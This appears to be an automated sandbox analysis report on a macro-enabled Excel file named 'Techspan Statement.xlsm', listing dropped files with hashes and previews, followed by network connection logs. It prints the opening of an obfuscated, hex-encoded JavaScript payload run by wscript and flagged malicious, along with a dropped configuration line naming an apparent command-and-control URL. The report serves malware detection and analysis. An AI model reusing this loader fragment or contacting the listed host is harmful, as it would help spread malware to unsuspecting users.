                                                                                                                                                                                          SHA-512:02D330148312F798DC1AC6909DEF3CB7D8A92A9277A5DF5BAF2BCAE04149DF1098C968A073BB30982DC8C127A1F2B4B2DB369F5131C94D8CF2584BF72965E844
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{. "ip": "102.165.48.83",. "city": "Washington",. "region": "Washington, D.C.",. "country": "US",. "loc": "38.9029,-77.0361",. "org": "AS174 Cogent Communications",. "postal": "20527",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                          Entropy (8bit):4.6175569056133225
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:qrPdn0FVVnQNM8KNExAJEW3n:aVn0vVnQNraExAJfn
                                                                                                                                                                                          MD5:F40D53C62C0D8551A3123EC0D347C269
                                                                                                                                                                                          SHA1:5F56B66259C3200346AC298F25C5B114C5D23054
                                                                                                                                                                                          SHA-256:3E68A5C5F076A9BA98AAD784FA5EEAD7FD26C8950D96416467BA7B2FC5790E20
                                                                                                                                                                                          SHA-512:BCF378175C6C3041F90250F378F47FC357947B30D5822DA8F93B71C9634F2E530416F893A058030348BC35F674344D765B32DADB349D530D43DA7096E87E1325
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:83(+)169(+)176(+)53(=)4000(*)1000(*)2000(*)1000(&)https:++webmicroengine.to+index.aspx
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:ASCII text, with very long lines (28285), with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20971520
                                                                                                                                                                                          Entropy (8bit):0.1720868549650804
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:YSRuzk9NPOqm//7mS7OGPGm2RAJ5qDUBbsB0HBWkdYPDoCiXaB3:dUBbsEWgk
                                                                                                                                                                                          MD5:E5AC26F7ABA37D0FA20078DEFDF19D27
                                                                                                                                                                                          SHA1:0792515D0EEE2F3E7A54449603123B05E35DB98D
                                                                                                                                                                                          SHA-256:F889855639D587626129F1F4CE31F4CEF5542ADA3D0AE20035E665AEFCA1D111
                                                                                                                                                                                          SHA-512:C33BE56B4AEBEECF7064DC6A95368DC17AD6B153F4D81D74E9B73FB53FBC49FC60BE4DA773800793CAF4A5C604EC08509608A549FC0E0A3BDAF2B59FD88FB4C6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/06/2023 17:16:17.172.EXCEL (0x1444).0x1544.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":15,"Time":"2023-12-06T17:16:17.172Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2023-12-06T17:16:16.8538868Z\", \"C\" : \"33\", \"Q\" : 8.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2023-12-06T17:16:16.8538868Z\", \"C\" : \"33\", \"Q\" : 22.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2023-12-06T17:16:16.8538868Z\", \"C\" : \"\", \"Q\" : 3.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20971520
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 6 16:16:19 2023, mtime=Wed Dec 6 16:16:19 2023, atime=Wed Dec 6 16:16:19 2023, length=8153, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):551
                                                                                                                                                                                          Entropy (8bit):4.643826548520779
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:85658XuLggu4L6MOjAYPoR2L6AzHJcJAmV:85YLgFdHApCHJcJAm
                                                                                                                                                                                          MD5:CED5B22E365AE746158CC6CEB78AA064
                                                                                                                                                                                          SHA1:896A19FB360423E024D992043F628269B66C2809
                                                                                                                                                                                          SHA-256:AFA3F0D91E6AD962923E1B6CC4EEE58592E278BA32ED7B092A6C685C7FAB438D
                                                                                                                                                                                          SHA-512:E45460ADDC52FABC1B59F2EDC7952FAE5A365242803DCDD1B4E55F755E8F6E81730572980BDDC9399C013A9D9FF33C8F622C54EC357D76B3F2A2D1CC920C1C30
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.... ......g(...z..g(...~..g(...............................P.O. .:i.....+00.../C:\...................p.2......W.. .9YMF2R~1.XLS..T......W...W.......K....................'...9.Y.M.F.2.R.V.F.A.4.B.Y...x.l.s.x.......C...............-.......B............F.......C:\9YMF2RVFA4BY.xlsx..&.....\.....\.....\.....\.....\.....\.....\.9.Y.M.F.2.R.V.F.A.4.B.Y...x.l.s.x.`.......X.......377142...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, System, Directory, ctime=Sat Dec 7 08:03:44 2019, mtime=Wed Dec 6 16:16:19 2023, atime=Fri Oct 6 08:39:55 2023, length=8192, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):386
                                                                                                                                                                                          Entropy (8bit):4.527693203733725
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:4xtQlhcUc7sKSRKljAldtxlQmK6dJV6dJ5vGmZp/t:88UsKSR+jAvzK0JV0JAmV
                                                                                                                                                                                          MD5:43ADE7C5E27ACDA62896EEDE1EC15768
                                                                                                                                                                                          SHA1:312039636F133B28D805C271A26E90F5C62049DC
                                                                                                                                                                                          SHA-256:80785FD80C990B444A17170A364CD37C2C85C137CE9782AD490268D4EA61B926
                                                                                                                                                                                          SHA-512:7F474F62E7C085EDA0D44A1878E62510ADE38E47D0BDF019BFFAFFE762B4086C9A4A89FC251124173C75A8F3BAD8B82B7F8BE1144E6F2DC808BFF84D478F262D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F..........b:.......g(..%v..9.... ....................../....P.O. .:i.....+00.../C:\.....................2...............-.......1............F.......C:\........\.....\.....\.....\.....\.....\.....`.......X.......377142...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 6 08:39:55 2023, mtime=Wed Dec 6 16:16:18 2023, atime=Wed Dec 6 16:16:15 2023, length=30320, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):559
                                                                                                                                                                                          Entropy (8bit):4.6979857016764095
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:8xc+GDQgxeSvHNEjAISoRdX8ZHZ+zrJMJAmV:8artxnWAISMtu5YrJMJAm
                                                                                                                                                                                          MD5:3EA3F002D0956E178A58FB84B91F7C2C
                                                                                                                                                                                          SHA1:03230AE02452CFEE35CE11208A75BCDD0E8CB5DC
                                                                                                                                                                                          SHA-256:A7AFEB17F07E822B0D6EB272E9DFC8D8C13BD54E2C715384DBFD803F6F44E633
                                                                                                                                                                                          SHA-512:D26F5342F93EB6B1F565D0B4DCFB4C9426408B401AA543B7C237FA343CEAB4239DFC1A5D0F4CFE9A4F08097BC9FAB3925121FB75A29D0430DBECC00A531AC2F1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.... ...%v..9....f..g(...=q.g(..pv......................~.|.2.pv...W.. .TECHSP~1.XLS..`......FW.L.W.............................#.T.e.c.h.s.p.a.n. .S.t.a.t.e.m.e.n.t...x.l.s.m.......\...............-.......[............F.......C:\Users\user\Desktop\Techspan Statement.xlsm........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.e.c.h.s.p.a.n. .S.t.a.t.e.m.e.n.t...x.l.s.m.`.......X.......377142...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):133
                                                                                                                                                                                          Entropy (8bit):5.175610449071981
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:H6jhQE2RY56Sm4uSQE2RYxqMJWMLU56Sv:HShQ/R26rSQ/RqIM26c
                                                                                                                                                                                          MD5:F634A788B28FB3C69A59C6A4E4E529DF
                                                                                                                                                                                          SHA1:C3E6B7BF85EFAFB831B3CEDAF83DC3B08FBE8B00
                                                                                                                                                                                          SHA-256:7F2E2BA35735DE6C9E8C769DC91B9B5DC92E46AFA1667D45D78F843D455BAD36
                                                                                                                                                                                          SHA-512:1D1ABFE4CCA8558245923AA7E49FE82CA1226C9B8BD5D3805674B45EDE67C60E4E8149AD9A0881352BF9E37369A50BA0011EFF378B54667D30F338FABCFB58EE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:[misc]..Techspan Statement.LNK=0..9YMF2RVFA4BY.LNK=0..[folders]..Techspan Statement.LNK=0..Local Disk (C).LNK=0..9YMF2RVFA4BY.LNK=0..
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):14
                                                                                                                                                                                          Entropy (8bit):2.699513850319966
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:QGiWlG:QGbY
                                                                                                                                                                                          MD5:C5A12EA2F9C2D2A79155C1BC161C350C
                                                                                                                                                                                          SHA1:75004B4B6C6C4EE37BE7C3FD7EE4AF4A531A1B1A
                                                                                                                                                                                          SHA-256:61EC0DAA23CBC92167446DADEFB919D86E592A31EBBD0AB56E64148EBF82152D
                                                                                                                                                                                          SHA-512:B3D5AF7C4A9CB09D27F0522671503654D06891740C36D3089BB5CB21E46AB235B0FA3DC2585A383B9F89F5C6DAE78F49F72B0AD58E6862DE39F440C4D6FF460B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..c.a.l.i.....
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                          Entropy (8bit):0.41381685030363374
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:/l:
                                                                                                                                                                                          MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                                          SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                                          SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                                          SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:............
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                          Entropy (8bit):0.41381685030363374
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:/l:
                                                                                                                                                                                          MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                                          SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                                          SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                                          SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:............
                                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3471505
                                                                                                                                                                                          Entropy (8bit):3.2415913316608447
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:OPvjvgyIrhhaFl2MTKAt+ja+wHFHL9jV5UM7jLOiC6XxCXhiRoZiRoCDj1dgN1BL:N
                                                                                                                                                                                          MD5:91513040D5722E04F3075B524C3F8D9D
                                                                                                                                                                                          SHA1:FAC5133804E5FA98B7078B2BD08B03DACD4ECED0
                                                                                                                                                                                          SHA-256:C92F42D672E9EDD78BDF87EB21216B90607BC4E1057C3093B0B39A95CF83F5A7
                                                                                                                                                                                          SHA-512:0C7B005F924DDB68CF1CD782CCBC43733D0B101A3AD4126944ACCF49A76E59891F070BA605697C811B687490BF243C2F1FBE206D9092530EDE16EEE4CB089E20
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Preview:try{var ZTVHDHOKAKY = ["\x49\x48\x5A\x68\x63\x69\x42\x4E\x56\x31\x42\x59\x52\x55\x52\x53\x54\x56\x56\x4E\x50\x56\x73\x69\x49\x69\x77\x69\x4B\x6B\x70\x4E\x49\x57\x5A\x49\x5A\x54\x59\x74\x66\x6C\x6F\x70\x64\x48\x6C\x26\x50\x23\x4A\x6B\x58\x6A\x42\x6F\x4A\x57\x64\x4D\x64\x55\x73\x60\x50\x55\x6B\x79\x51\x56\x77\x69\x4C\x46\x78\x63\x56\x48\x67\x6A\x4A\x69\x41\x31\x4F\x6D\x74\x69\x4F\x32\x39\x6A\x57\x33\x4A\x56\x52\x48\x4E\x54\x54\x32\x6F\x34\x59\x46\x42\x37\x56\x32\x45\x78\x4A\x43\x60\x44\x4C\x7A\x34\x26\x52\x6B\x55\x33\x52\x33\x31\x36\x56\x6C\x46\x70\x62\x69\x74\x66\x4D\x33\x42\x33\x4B\x45\x42\x53\x54\x6D\x23\x6E\x62\x48\x46\x5A\x64\x6C\x67\x23\x58\x53\x49\x73\x49\x6E\x4A\x56\x49\x7A\x6C\x72\x62\x79\x55\x2F\x54\x69\x74\x6F\x4A\x33\x68\x44\x4C\x23\x64\x59\x5A\x7A\x73\x7A\x4C\x56\x41\x32\x56\x45\x6C\x46\x5A\x57\x4E\x61\x4F\x69\x6F\x39\x5A\x48\x64\x54\x61\x55\x51\x2B\x54\x48\x6C\x49\x4F\x46\x77\x69\x4E\x33\x56\x68\x58\x46\x78\x73\x52\x6A\x51\x26\x63\x57\x34\x77\x49\x45\x6F\x6D\x66\x46\x46\x41
                                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):88
                                                                                                                                                                                          Entropy (8bit):4.691830766118723
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:qrPdn0FVVnQNM8KNExAJEW3ov:aVn0vVnQNraExAJfy
                                                                                                                                                                                          MD5:2557FE225E15B46D46C585AC56A99600
                                                                                                                                                                                          SHA1:FA398D8C97E31697A5A266A2CDFFD53813E64BFD
                                                                                                                                                                                          SHA-256:805832E0E1FEF7064021C751C7C28E7E42712D074EE447823C5DBD9E448EFB12
                                                                                                                                                                                          SHA-512:26A56B2E4DE99F4762890BBE27F8803D0A07562065FB32E1BF43818C02840B4E783DE39C95334B58A5A21D670A4D002614496E5302916E476B40D67C67D467E8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:83(+)169(+)176(+)53(=)4000(*)1000(*)2000(*)1000(&)https:++webmicroengine.to+index.aspx..
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                          Entropy (8bit):1.3520167401771568
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:8Nultln:X1n
                                                                                                                                                                                          MD5:9AC4D67F6E514F452D4A1DB79CE3B2E8
                                                                                                                                                                                          SHA1:33F8C665ECBB81275D2E49D48F2565A58A282043
                                                                                                                                                                                          SHA-256:407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
                                                                                                                                                                                          SHA-512:018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                          Entropy (8bit):1.3520167401771568
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:8Nultln:X1n
                                                                                                                                                                                          MD5:9AC4D67F6E514F452D4A1DB79CE3B2E8
                                                                                                                                                                                          SHA1:33F8C665ECBB81275D2E49D48F2565A58A282043
                                                                                                                                                                                          SHA-256:407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
                                                                                                                                                                                          SHA-512:018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                          File type:Microsoft OOXML
                                                                                                                                                                                          Entropy (8bit):7.951812837022338
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Excel Microsoft Office Open XML Format document with Macro (52504/1) 52.24%
                                                                                                                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 39.80%
                                                                                                                                                                                          • ZIP compressed archive (8000/1) 7.96%
                                                                                                                                                                                          File name:Techspan Statement.xlsm
                                                                                                                                                                                          File size:30'320 bytes
                                                                                                                                                                                          MD5:f769ba7282d512a16fbf552e4f90723a
                                                                                                                                                                                          SHA1:80fa8fa28d4655bd1890a8d96f7bf3abd76ac0e4
                                                                                                                                                                                          SHA256:5a4b747e7daabd11e3ab84f9e239a03a1dc29f88c4d7efb957cf5327b9a21e53
                                                                                                                                                                                          SHA512:0c24a02ea62d53113bb88d5fbc885c65b4d0c3e7fb2387601093a0581496ee8663fff2d706795b871ea8e0e7f40563d6db5171d3621ffa8a68115b92ac1a0901
                                                                                                                                                                                          SSDEEP:768:josjCKQO4CTGS8XAVFc05zJust+uQKxHUXjk6wf:aKr48GSWqFclK7ejkbf
                                                                                                                                                                                          TLSH:1FD2E1297D89458DE59B92F031E834C1D28F324AAA557258326F10E18457ECB3F1FF2E
                                                                                                                                                                                          File Content Preview:PK..........!.?&..............[Content_Types].xml...n.0............b....u..@..`$&../.J..}i;-.".W........LMo..U..dch.........e#.<..........l..I........Tqt.F....J.n....0.e......T......&.k.c(.J]:.1.....].n..=d2.AT?.....H.Y...j...T...j..9....u...X..wb.w.t..#2
                                                                                                                                                                                          Icon Hash:1d356664a4a09519
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Dec 6, 2023 18:17:26.680810928 CET49726443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.680860043 CET4434972613.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.680927992 CET49726443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681114912 CET49727443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681150913 CET4434972713.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681210995 CET49727443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681557894 CET49728443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681581020 CET4434972813.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681628942 CET49728443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681685925 CET49727443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681694031 CET4434972713.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681847095 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681876898 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681900024 CET49728443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681911945 CET4434972813.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.681926012 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682071924 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682080030 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682091951 CET49726443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682107925 CET4434972613.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682184935 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682216883 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682270050 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682387114 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.682398081 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.983256102 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.983452082 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.985228062 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.985239983 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.985538960 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.986047983 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.986141920 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.987385035 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.987438917 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.987454891 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.987823963 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.989521980 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.996073961 CET4434972613.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.996179104 CET49726443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.997303009 CET49726443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:26.997317076 CET4434972613.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.997576952 CET4434972613.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:26.998713017 CET49726443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.028738976 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.029483080 CET4434972713.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.029602051 CET49727443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.029802084 CET4434972813.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.029881954 CET49728443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.031090975 CET49727443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.031119108 CET4434972713.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.031367064 CET49728443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.031385899 CET4434972813.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.031388998 CET4434972713.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.031708002 CET4434972813.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.032630920 CET49727443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.032737017 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.032861948 CET49728443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.040736914 CET4434972613.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.072746038 CET4434972713.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.076740980 CET4434972813.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087004900 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087109089 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087193966 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087547064 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087579012 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087595940 CET49730443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087603092 CET4434973013.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087658882 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087769985 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087825060 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087883949 CET49729443192.168.2.1613.107.219.40
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087904930 CET4434972913.107.219.40192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:17:27.087918043 CET49729443192.168.2.1613.107.219.40
